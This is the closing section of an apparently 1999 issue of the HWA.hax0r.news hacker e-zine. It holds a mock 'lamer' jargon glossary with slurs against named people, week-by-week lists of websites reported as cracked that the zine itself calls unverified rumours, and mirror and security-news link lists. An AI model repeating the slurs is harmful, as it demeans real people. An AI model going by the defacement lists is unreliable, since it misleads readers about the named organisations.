dumped core. "NTLDR not found. INVALID_BOOT_DEVICE in kernel32.exe 006383dhX00029393." Posted on Fri 26 Mar 00:21:38 1999 GMT Written by Potato -----------------------------/----------------------------- You have to learn the lingo to become 31337 AOL - The best isp in the world. All of the real hax0rs use it. bot - ereet program to 0wn you irc channel for you while you are gone, Curt is the god of bots chix0rs - girlies that hax0rs will never get because they ph33r them too much. ftp - k-rad hax0ring utility used to get passwd files and warez.(if the passwd file is shadow, make sure you get on irc and ask everyone how to unshadow it.) hax0r - Someone that punts, nukes, mailbombs, and 0wns everyone else and tells them that repeatedly. IRC - The place where lamers go to chat. The lamest channels are #2600, #hack, #phreak, #hackphreak, etc. The only k-cool channels are #bastards on effnet, #warez, and #gaycartoonsex. lame - stupid, not leet, suck ass, "emmanuel goldstein is lame" leet - (elite, eleet, 1337, 31337 etc.)good, cool , k-rad, "Cochise is leet" Linux - The OS that lamers that think they are hax0rs use. Microsoft Unix 98 - The super k-rad OS that every real hax0r uses. progs - Tools that every hax0r must have for punting, mailbombing, scrolling, etc. pr0n - pictures of nekkid chix0rs. (note: this is as close to a chix0r a hax0r will ever get.) skilless whore - a stupid bitchx0r that thinks she knows everything, but doesnt know anything. "Orin and Annie are skilless whores" Warez - K-rad pirated software that every hax0r must trade. http://neatoelito.org/hax0ring/jargon.html - submitted by A.Silliman @HWA SITE.1 @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Looks like things are quieter than normal perhaps with all the FBI action thats going down and groups getting raided some people are becoming a little antsy, well heres the list for this week according to HNN... From HNN rumours section, http://www.hackernews.com/ May 24th contributed by Anonymous Cracked It has been a busy weekend for some people. These are the sites that have been reported to HNN as cracked. Please remember that this is the rumours section. While most of these are verified we can't verify them all. http://www.elitehackers1.net http://www.ruckstuhlgaragen.ch http://www.gibson.com http://www.e.gov http://www.ebuy.gov http://codesign.scu.edu http://www.castnetcom.com http://plan.arch.usyd.edu.au http://www.4women.gov http://www.clic.nl http://www.etnews.co.kr http://www.hackvp.net http://eval1.oit.unc.edu http://elkriver.k12.mn.us http://jutr.gov.my http://nc-101.hypermart.net http://www.barekids.com http://www.holsey.com http://www.team-liquid.com http://www.metro.seoul.kr http://learnweb.harvard.edu http://ngpsun.ngpc.state.ne.us http://www.buscominc.com http://www.columbuslumber.com http://www.cpavision.org http://www.elitexposure.com http://www.superiortours.com May 27th From HNN rumours section; contributed by Anonymous Cracked These are the sites that have been reported to us as cracked. http://do-nt.8j.net-2 http://data.digex.net http://nation.com.pk http://www.pak.gov.pk http://www.the-dark-immortals.org May 28th From HNN rumours section; contributed by Anonymous Cracked The following websites have been reported as cracked http://info2.cs-snd.com.cn http://mmic.snu.ac.kr http://vunews.vanderbilt.edu http://wfserverb.weifang.gov.cn http://www.abatelli.com http://www.brain3.com http://www.bringardner.com http://www.century21rustic.com http://www.cookpony.com http://www.craftsmenhomes.com http://www.devlin-mcniff.com http://www.dunemere.com http://www.firsttowne.com http://www.hampton.net http://www.hanfra.com http://www.lambagency.com http://www.mainstproperties.com http://www.makah.org http://www.montauk.net http://www.morleyagency.com http://www.moviespotlight.com http://www.warez-city.cx http://www.bobhowardnissan.com http://www.cns.state.va.us http://www.senate.gov ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html hack-faq Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html Original jargon file New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ New jargon file HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.genocide2600.com/~tattooman/zines/hwahaxornews/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Go there Brasil........: http://www.psynet.net/ka0z Go there http://www.elementais.cjb.net Go there Columbia......: http://www.cascabel.8m.com Go there http://www.intrusos.cjb.net Go there Indonesia.....: http://www.k-elektronik.org/index2.html Go there http://members.xoom.com/neblonica/ Go there http://hackerlink.or.id/ Go there Netherlands...: http://security.pine.nl/ Go there Russia........: http://www.tsu.ru/~eugene/ Go there Singapore.....: http://www.icepoint.com Go there Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. Go there Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]